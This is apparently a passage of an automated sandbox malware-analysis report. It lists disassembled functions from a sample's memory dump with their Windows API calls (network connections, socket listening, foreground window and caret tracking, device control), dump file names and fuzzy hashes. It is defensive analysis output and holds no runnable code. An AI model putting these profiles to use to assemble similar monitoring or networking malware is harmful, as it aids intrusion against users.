                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00E84E44
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00E84E7A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3058430110-0
                                                                                                                        • Opcode ID: d8f82bce5e111f2d2ed10e99d27d3d056d63445775db09dd36c09b57eee5fe82
                                                                                                                        • Instruction ID: d43c6517a799e736c11f6c4f46abb3ce70f75c07e128f8c4c325fe43fb1c46aa
                                                                                                                        • Opcode Fuzzy Hash: d8f82bce5e111f2d2ed10e99d27d3d056d63445775db09dd36c09b57eee5fe82
                                                                                                                        • Instruction Fuzzy Hash: A831BE71600247AFDF22AF75CC45BAA7BA6FF41314F159529E82DAB1E0E730E850DB90
                                                                                                                        Function 00EB7AA2 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetForegroundWindow.USER32 ref: 00EB7AB6
                                                                                                                          • Part of subcall function 00E969C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E969E3
                                                                                                                          • Part of subcall function 00E969C9: GetCurrentThreadId.KERNEL32 ref: 00E969EA
                                                                                                                          • Part of subcall function 00E969C9: AttachThreadInput.USER32(00000000,?,00E98127), ref: 00E969F1
                                                                                                                        • GetCaretPos.USER32(?), ref: 00EB7AC7
                                                                                                                        • ClientToScreen.USER32(00000000,?), ref: 00EB7B00
                                                                                                                        • GetForegroundWindow.USER32 ref: 00EB7B06
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2759813231-0
                                                                                                                        • Opcode ID: 73861d0347875277411e0d859027983c2acbb8948c92595939537e12a8b5227d
                                                                                                                        • Instruction ID: 8e92768c7121ee50660f66088d5fde3d00ffd781d2ce4d917ea23fb81302794b
                                                                                                                        • Opcode Fuzzy Hash: 73861d0347875277411e0d859027983c2acbb8948c92595939537e12a8b5227d
                                                                                                                        • Instruction Fuzzy Hash: 4C313E71D00108AFCB10EFB5DC819EFBBF9EF98310B10906AE916F7211D6359E058BA0
                                                                                                                        Function 00EBEFA8 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E6AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00E6AF8E
                                                                                                                        • GetCursorPos.USER32(?), ref: 00EBEFE2
                                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00ECF3C3,?,?,?,?,?), ref: 00EBEFF7
                                                                                                                        • GetCursorPos.USER32(?), ref: 00EBF041
                                                                                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00ECF3C3,?,?,?), ref: 00EBF077
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2864067406-0
                                                                                                                        • Opcode ID: 87ee8334fd7a550d43127e7a0942943f4745a2ddbf80e3575af9054db72914e1
                                                                                                                        • Instruction ID: 6e7ac9b780b66c8ede170898f59acbc95804e4c43e9f887b64166466a3efc3ad
                                                                                                                        • Opcode Fuzzy Hash: 87ee8334fd7a550d43127e7a0942943f4745a2ddbf80e3575af9054db72914e1
                                                                                                                        • Instruction Fuzzy Hash: A621D035601018FFCB259F99DC98EEB7BB5FB49764F048069F905A72B2C3309961EB90
                                                                                                                        Function 00EA497B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EA49B7
                                                                                                                          • Part of subcall function 00EA4A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EA4A60
                                                                                                                          • Part of subcall function 00EA4A41: InternetCloseHandle.WININET(00000000), ref: 00EA4AFD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Internet$CloseConnectHandleOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1463438336-0
                                                                                                                        • Opcode ID: c5c8a425eff7942d9b31b09e6d4e383d571a21b8d79715d618fc4902903946a2
                                                                                                                        • Instruction ID: b6f14ba23f7b74dadd9ea730fd28f6fc288fcd3d71ec65cce2c4871b0fadd927
                                                                                                                        • Opcode Fuzzy Hash: c5c8a425eff7942d9b31b09e6d4e383d571a21b8d79715d618fc4902903946a2
                                                                                                                        • Instruction Fuzzy Hash: 0621C5B6244605BFDB119F609C00FBBB7A9FFCE701F10501AFA05AA590EBB1B424A754
                                                                                                                        Function 00EB8834 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00EB88A3
                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00EB88BD
                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00EB88CB
                                                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00EB88D9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Long$AttributesLayered
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2169480361-0
                                                                                                                        • Opcode ID: 358568ca2d6ff07acaa7aec819c2d25749d0875f20ec10478c675e390483b18b
                                                                                                                        • Instruction ID: 926e28f80faf2a464d2748dafdecf08ef3a63666eaaf064ca94b2984ea0f8c30
                                                                                                                        • Opcode Fuzzy Hash: 358568ca2d6ff07acaa7aec819c2d25749d0875f20ec10478c675e390483b18b
                                                                                                                        • Instruction Fuzzy Hash: 3911AC31249110AFDB18AB28DC15FAA7BEDEF85325F54411AF926E73A1CB60AC04CB90
                                                                                                                        Function 00EA900C Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00EA906D
                                                                                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00EA907F
                                                                                                                        • accept.WSOCK32(00000000,00000000,00000000), ref: 00EA908C
                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00EA90A3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastacceptselect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 385091864-0
                                                                                                                        • Opcode ID: 83f2651ccbd7ecee05b5b7245884f39cb3fffbe5e9561729ce0438a6c961704b
                                                                                                                        • Instruction ID: e3242d63091b2b16841350e4e949e6d3fb66c91ea4362605513ee05e38c6766d
                                                                                                                        • Opcode Fuzzy Hash: 83f2651ccbd7ecee05b5b7245884f39cb3fffbe5e9561729ce0438a6c961704b
                                                                                                                        • Instruction Fuzzy Hash: 742162719001249FCB109F69DC85A9ABBFCEF49750F00816AF849E7291DA749A458B90
                                                                                                                        Function 00E918E8 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E92CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00E918FD,?,?,?,00E926BC,00000000,000000EF,00000119,?,?), ref: 00E92CB9
                                                                                                                          • Part of subcall function 00E92CAA: lstrcpyW.KERNEL32(00000000,?,?,00E918FD,?,?,?,00E926BC,00000000,000000EF,00000119,?,?,00000000), ref: 00E92CDF
                                                                                                                          • Part of subcall function 00E92CAA: lstrcmpiW.KERNEL32(00000000,?,00E918FD,?,?,?,00E926BC,00000000,000000EF,00000119,?,?), ref: 00E92D10
                                                                                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00E926BC,00000000,000000EF,00000119,?,?,00000000), ref: 00E91916
                                                                                                                        • lstrcpyW.KERNEL32(00000000,?,?,00E926BC,00000000,000000EF,00000119,?,?,00000000), ref: 00E9193C
                                                                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00E926BC,00000000,000000EF,00000119,?,?,00000000), ref: 00E91970
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                                                                        • String ID: cdecl
                                                                                                                        • API String ID: 4031866154-3896280584
                                                                                                                        • Opcode ID: 788ba568965f591c417074824d42306893cf988f18fe3c1b8958fa6b3af542dc
                                                                                                                        • Instruction ID: e15727cb7f8f6884ec41d3119f0e5e986687e2134356adb528399cc63ce9ab9c
                                                                                                                        • Opcode Fuzzy Hash: 788ba568965f591c417074824d42306893cf988f18fe3c1b8958fa6b3af542dc
                                                                                                                        • Instruction Fuzzy Hash: E911D336101302AFCF15AF34DC55EBA77B8FF88354B40A06AF806DB250EB31994187A1
                                                                                                                        Function 00E83D46 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 00E83D65
                                                                                                                          • Part of subcall function 00E745EC: __FF_MSGBANNER.LIBCMT ref: 00E74603
                                                                                                                          • Part of subcall function 00E745EC: __NMSG_WRITE.LIBCMT ref: 00E7460A
                                                                                                                          • Part of subcall function 00E745EC: RtlAllocateHeap.NTDLL(01130000,00000000,00000001,?,?,?,?,00E70127,?,00E5125D,00000058,?,?), ref: 00E7462F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 614378929-0
                                                                                                                        • Opcode ID: 3c5c2ee97b23021346083d1479ecfa9735f25a3db8c825d3dfaba1e5444e4b4e
                                                                                                                        • Instruction ID: a294b7ff2a8fc89840ba5a530e4878f55046c12b959c8733695d8ec2848155bb
                                                                                                                        • Opcode Fuzzy Hash: 3c5c2ee97b23021346083d1479ecfa9735f25a3db8c825d3dfaba1e5444e4b4e
                                                                                                                        • Instruction Fuzzy Hash: 43110632405215AFDB353F74AC046AA3BD8AF10764B50A526F94CBA1D1DF308A80C791
                                                                                                                        Function 00E51E58 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00E51E87
                                                                                                                          • Part of subcall function 00E538E4: _memset.LIBCMT ref: 00E53965
                                                                                                                          • Part of subcall function 00E538E4: _wcscpy.LIBCMT ref: 00E539B5
                                                                                                                          • Part of subcall function 00E538E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E539C6
                                                                                                                        • KillTimer.USER32(?,00000001), ref: 00E51EDC
                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E51EEB
                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00EC4526
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1378193009-0
                                                                                                                        • Opcode ID: 9b743bca3bdd5eab64af1a6ea7395335003a16869a14c5f1e85f2015f924cd95
                                                                                                                        • Instruction ID: 4fc3fbadb6fe1ee791a300d3bf6e6c4e04edcad273c398ad93d75b5a1bec4948
                                                                                                                        • Opcode Fuzzy Hash: 9b743bca3bdd5eab64af1a6ea7395335003a16869a14c5f1e85f2015f924cd95
                                                                                                                        • Instruction Fuzzy Hash: 1921D7B1904384AFE73287248C56FEBBBECAB05308F04148EEA9E76181C7755A89CB51
                                                                                                                        Function 00E9713C Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00E9715C
                                                                                                                        • _memset.LIBCMT ref: 00E9717D
                                                                                                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00E971CF
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00E971D8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1157408455-0
                                                                                                                        • Opcode ID: cc7d4409983ff65303088ee5d755fbb687277e418470a65c5017e9d7d8c89cc1
                                                                                                                        • Instruction ID: 59ca3d138a78b46a607197697576000210ae565e4b78a710382fc06670569f8e
                                                                                                                        • Opcode Fuzzy Hash: cc7d4409983ff65303088ee5d755fbb687277e418470a65c5017e9d7d8c89cc1
                                                                                                                        • Instruction Fuzzy Hash: E911CA729062287BD7205BA5AC4DFEBBBBCEF45764F10419AF504F71D0D2744E848BA4
                                                                                                                        Function 00E913D1 Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00E913EE
                                                                                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00E91409
                                                                                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00E9141F
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00E91474
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3137044355-0
                                                                                                                        • Opcode ID: 689aff05c778a55dce7a785105fbec8a8ff699db91f6d085c171ee143dc58d69
                                                                                                                        • Instruction ID: 29c61f3941dd4d6f14259db27d212615dfa239d38db632ee82e77f70655e6f66
                                                                                                                        • Opcode Fuzzy Hash: 689aff05c778a55dce7a785105fbec8a8ff699db91f6d085c171ee143dc58d69
                                                                                                                        • Instruction Fuzzy Hash: FB216D7154120AAFDF209F91DC88ADABBB8EF04744F0094EAA562B7150D774EA48DB51
                                                                                                                        Function 00EA92C0 Relevance: 6.1, APIs: 4, Instructions: 60networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E6F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00E9AEA5,?,?,00000000,00000008), ref: 00E6F282
                                                                                                                          • Part of subcall function 00E6F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00E9AEA5,?,?,00000000,00000008), ref: 00E6F2A6
                                                                                                                        • gethostbyname.WSOCK32(?,?,?), ref: 00EA92F0
                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00EA92FB
                                                                                                                        • _memmove.LIBCMT ref: 00EA9328
                                                                                                                        • inet_ntoa.WSOCK32(?), ref: 00EA9333
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1504782959-0
                                                                                                                        • Opcode ID: 8a768551215ebe70bdd23d26567bac4d1846bf4d29f8f29e9ecf715cf951a7f7
                                                                                                                        • Instruction ID: 342a198311ad89f95c22891b79817062f5e69208d69e2f664a01f947c365fae1
                                                                                                                        • Opcode Fuzzy Hash: 8a768551215ebe70bdd23d26567bac4d1846bf4d29f8f29e9ecf715cf951a7f7
                                                                                                                        • Instruction Fuzzy Hash: 32115E76504109AFCB04FBA0DD56CAEB7F9EF083117145065F906BB1A2DB30AE08CB61
                                                                                                                        Function 00E8C265 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00E8C285
                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E8C297
                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E8C2AD
                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E8C2C8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3850602802-0
                                                                                                                        • Opcode ID: df33cee5dfb88b50610914c5eaac8168c9a97d5833f252149e121d0df04a13a5
                                                                                                                        • Instruction ID: b7602e95e44b648a5041b2b4041f6dd5203d016ec7ca084c9738f01182cb3692
                                                                                                                        • Opcode Fuzzy Hash: df33cee5dfb88b50610914c5eaac8168c9a97d5833f252149e121d0df04a13a5
                                                                                                                        • Instruction Fuzzy Hash: B2111C7A940618FFDB11EBD5CC85E9DBBB4FB09714F204091E608B7294D671AE10DBA4
                                                                                                                        Function 00E97C45 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00E97C6C
                                                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00E97C9F
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00E97CB5
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00E97CBC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
